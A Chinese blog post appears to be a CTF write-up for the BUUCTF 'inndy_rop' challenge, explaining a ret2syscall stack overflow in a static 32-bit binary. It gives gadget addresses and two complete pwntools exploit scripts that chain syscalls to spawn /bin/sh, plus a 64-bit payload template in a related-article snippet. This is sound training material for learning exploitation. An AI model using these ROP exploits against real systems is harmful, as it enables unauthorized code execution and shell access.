ret2syscall

原创 已于 2024-09-10 17:05:10 修改 · 372 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

于 2024-09-10 14:07:52 首次发布

[buu] inndy_rop

检查保护,文件只开启了NX。接着丢进ida里

找到目标函数,gets函数存在明显的栈溢出,并且可以看到该程序是静态链接的程序,这也就意味着我们可以找到足够使用的gaget去构造rop链从而控制程序执行流。

动调确定溢出长度位offset=16

寻找目标gagets

0x080b8016 : pop eax ; ret
0x080481c9 : pop ebx ; ret
0x080de769 : pop ecx ; ret
0x0806ecda : pop edx ; ret

对应exp:

from pwn import*
i=process("./rop")
context.log_level="debug"
 
pop_eax=0x080b8016
pop_ebx=0x080481c9
pop_ecx=0x080de769
pop_edx=0x0806ecda
int80=0x0806f430#用radare2,ropgadget搜索不到int 0x80;ret
bss=0x080EB5BD
p1=cyclic(0xc+4)
p1+=flat([pop_eax,0x3,pop_ebx,0,pop_ecx,bss,pop_edx,0x10,int80])
p1+=flat([pop_eax,0xb,pop_ebx,bss,pop_ecx,0,pop_edx,0,int80])
 
 
i.sendline(p1)
i.sendline(b"/bin/sh\x00")
 
i.interactive()

也可利用ropchain

exp:

from pwn import*
from struct import*     #pack
#io=process('./rop')
io=remote('node4.buuoj.cn',29207)
p=b'a'*(0xc+4)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
io.sendline(p)
io.interactive()

igiohhh
关注
PWN基础-ROP技术-ret2syscall-64位程序栈溢出利用
Welcome To My6n Blog
05-08 776
后面传两个参数就可以了,分开写,一起写都可以的,这里就不做过多演示了。前置 ret2syscall 的基础我们就不做过多讲解了。execve 系统调用号是 59,也就是 0x3b。ida 看一下 main 函数,存在明显的栈溢出。看到有两个连一起的,当然我们也可以一个一个地传参。而 64 位系统调用最后是执行 syscall。32 位系统调用最后是执行 int x080。我们这里只用到前三个就可以了,以及 rax。这里看到的这个不对,因为后面没有 ret。正确的应该是 0x45BAC5。
ARM Linux系统调用详细分析
liduxun的专栏
08-31 9340
文件: linux-2.6.30.4/arch/arm/kernel/entry-common.S linux-2.6.30.4/arch/arm/kernel/calls.S 在entry-common.S中包含了上次calls.S,这里简单分析前两次: 第一次: 在entry-common.S中: .equ NR_syscalls,0 #define CALL(x) .equ
linux系统调用
nanfenglei23的专栏
12-14 1875
从原理到具体实现详细解释linux系统调用
Linux系统调用(syscall)原理(转)
weixin_34245169的博客
03-13 1710
引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-ar...
Android Hook框架adbi的分析(3)---编译和inline Hook实践
Fly20141201. 的专栏
07-16 3715
本文博客地址:http://blog.youkuaiyun.com/qq1084283172/article/details/75200800一、序言在前面的博客中,已经分析过了Android Hook框架adbi源码的具体实现,Android Hook框架adbi的实现主要分为两部分,一部分是root权限下的Android跨进程的so注入,一部分是基于Android系统的inline Hook。
【PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 3923
虽然网上(包括优快云)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
ret2syscall简单总结
ULGANOY的博客
07-05 1729
主要是自己的简单的学习总结。
ret2syscall 入门
akdelt的博客
01-24 650
系统调用是操作习系统提供给应用程序的一种接口,允许应用程序请求操作系统执行特权指令,如文件操作,网络通信,进程管理等。x86 通过 int 0x80 指令进行系统调用,amd64 通过 syscall 指令进行系统调用比如 write 函数32位汇编代码系统调用号,触发 nr_writemov ebx,1mov edx,13int 0x80;中断触发系统调用‘’
RET2syscall
T_Fire_of_Square的博客
12-18 482
基本rop之一,意为call system,控制程序执行系统调用,获取shell。
ret2syscall 原理与实践
m0_57836225的博客
12-12 1001
在 CTF(夺旗赛)的 PWN(二进制漏洞利用)挑战中,ret2syscall 是一种经典且重要的利用技巧,用于获取目标系统的控制权。掌握 ret2syscall 对于深入理解二进制漏洞利用和提升 PWN 解题能力具有关键意义。在操作系统中,系统调用是用户程序与操作系统内核之间的接口。用户程序通过执行特定的指令(如在 x86 架构下的 int 0x80 或 syscall 指令),并传递相应的参数,来请求内核执行特定的功能,如文件操作、进程管理等。
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1492
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
pwn学习笔记(3)ret2syscall
qq_66013948的博客
02-13 1121
​ ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
Linux:五种IO模型
2301_80894970的博客
12-27 991
本文介绍了五种I/O模型的理论概念,重点分析了非阻塞I/O和多路转接I/O模式。文章通过钓鱼的生动比喻,阐述了阻塞I/O、非阻塞I/O、信号驱动I/O、多路检测I/O和异步I/O的区别。详细讲解了select、poll和epoll三种多路转接技术的实现原理和代码示例,比较了它们的优缺点。特别深入分析了epoll的水平触发(LT)和边缘触发(ET)两种工作模式,指出ET模式必须配合非阻塞I/O使用才能发挥最佳性能。通过理论讲解和代码实现相结合的方式,全面展示了Linux系统下高效I/O处理的实现方法和技术演进
基于 Linux 内核模块的字符设备互斥访问实验
weixin_57340941的博客
12-30 444
这个信号量实验是。
Linux CFS 调度器深度解析
最新发布
X
12-30 776
数学模型驱动: 用 vruntime 精确量化公平性简单性: 核心算法简洁优雅, 易于理解和维护自适应性: 自动适应不同负载和工作模式可扩展性: 通过组调度支持复杂场景表5: CFS 调度器的核心优势总结维度传统调度器CFS改进效果公平性基于优先级的时间片按权重的比例公平更精确的公平分配交互性需要启发式识别自然获得良好响应交互进程响应更快吞吐量固定时间片可能浪费动态调整, 减少切换整体吞吐量提升可配置性多个复杂参数主要调整 nice 值用户接口更简单代码维护复杂启发式逻辑。
Linux 实战:从零实现动态进度条(含缓冲区原理与多版本优化)
会当凌绝顶,一览众山小
12-28 2087
Linux 开发中,进度条是最基础也最实用的系统程序之一 —— 无论是文件下载、编译构建还是数据处理,一个直观的动态进度条能极大提升用户体验。但看似简单的进度条,背后藏着行缓冲区、回车换行区别、字符刷新等关键知识点。本文从基础概念入手,先拆解进度条的实现逻辑,再逐步实现 “固定速度” 和 “自适应进度” 两个版本,最后优化细节让进度条更流畅美观,帮你不仅 “会写”,还能 “理解为什么这么写”。
Linux 防火墙配置详解:iptables 与 firewalld 的实战指南
A5互联
12-30 957
在企业级 Linux 运维场景中,防火墙不仅是简单的“开关”,而是关系到网络安全性、业务可用性与性能边界的重要组件。本文以真实项目经验为基础,结合具体硬件配置、产品参数、代码示例和性能评估,全面讲解 `iptables` 与 `firewalld` 的架构差异、实战配置与优化方法,帮助你从一线配置走向深入的性能调优与安全设计。
ret2syscall 64位
11-12
ret2syscall是一种ROP(Return Oriented Programming)技术,用于在64位程序栈溢出利用中执行系统调用。其核心思路是通过构造栈上的数据,控制程序的执行流程,将寄存器设置为系统调用所需的参数,然后触发系统调用以执行特定操作,如执行shell等。 在64位系统中,常见的系统调用需要设置的寄存器及其作用如下: - `rax`:存储系统调用号。 - `rdi`:第一个参数。 - `rsi`:第二个参数。 - `rdx`:第三个参数。 为了实现ret2syscall,需要找到合适的gadget(小的代码片段)来控制寄存器的值。可以使用工具如`ROPgadget`来查找这些gadget。例如,为了设置`rdi`、`rsi`和`rdx`寄存器,可以使用以下命令来查找相应的`pop`指令gadget: ```bash ROPgadget --binary ret2sys_64 --only "pop|ret" | grep "pop rdi ; ret" ROPgadget --binary ret2sys_64 --only "pop|ret" | grep "pop rsi ; ret" ROPgadget --binary ret2sys_64 --only "pop|ret" | grep "pop rdx ; ret" ``` 以下是一个简单的伪代码示例,展示了如何构造一个ret2syscall的payload: ```python from pwn import * # 加载目标二进制文件 elf = ELF('ret2sys_64') # 查找gadget pop_rdi = 0xdeadbeef # 替换为实际的pop rdi; ret地址 pop_rsi = 0xcafebabe # 替换为实际的pop rsi; ret地址 pop_rdx = 0x13371337 # 替换为实际的pop rdx; ret地址 syscall = 0xfeedfeed # 替换为实际的syscall地址 # 系统调用号(例如,execve为59) syscall_num = 59 # 要执行的命令(例如,/bin/sh) cmd = "/bin/sh\x00" cmd_addr = elf.bss() + 0x100 # 在bss段找一个地址存放命令 # 构造payload payload = b'A' * offset # offset为溢出所需的填充字节数 payload += p64(pop_rdi) payload += p64(cmd_addr) payload += p64(pop_rsi) payload += p64(0) payload += p64(pop_rdx) payload += p64(0) payload += p64(pop_rax) payload += p64(syscall_num) payload += p64(syscall) # 发送payload p = process('ret2sys_64') p.sendline(payload) p.interactive() ``` 在实际应用中,需要根据具体的二进制文件和环境进行调整。同时,还需要注意ASLR(地址空间布局随机化)等防护机制的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值